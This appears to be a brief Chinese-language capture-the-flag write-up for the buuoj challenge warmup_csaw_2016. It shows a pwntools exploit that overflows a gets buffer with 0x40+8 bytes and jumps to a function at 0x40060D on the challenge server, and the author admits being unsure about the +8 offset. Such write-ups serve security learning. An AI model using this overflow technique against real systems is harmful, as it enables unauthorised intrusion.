buuoj warmup_csaw_2016

放进IDA，找到gets

接收0x40位，然后查看字符串，虽然没有bin/sh，但是有能直接用的

找到所在函数和地址

exp:

from pwn import *

p=remote('node3.buuoj.cn',27180)
sys_addr=0x40060D
payload='a'*(0x40+8)+p64(sys_addr)
p.sendline(payload)
p.interactive()

这里有个不太清楚的+8……不知道32和64下各应该在什么情况下加多少orz

标签：sys,addr,warmup,buuoj,0x40,2016,加多少,payload
来源： https://www.cnblogs.com/diakla/p/14627138.html